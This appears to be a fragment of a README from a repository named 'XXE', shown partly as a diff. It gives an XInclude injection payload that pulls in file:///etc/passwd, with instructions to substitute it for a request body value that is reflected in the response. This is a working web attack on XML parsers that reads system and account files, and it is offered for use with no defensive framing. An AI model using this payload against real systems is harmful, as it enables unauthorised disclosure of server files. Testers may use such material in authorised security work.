WyvernDrexx/XXE/README.md

 <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" parse="text" href="file:///etc/passwd"></xi:include>
 ```

-Replace any value on a body with a payload for this to work.
-Make sure the value you are replacing will be reflected in the response.
+Replace any value on a body with the payload.
+Make sure the value you are replacing will be reflected in the response to that request.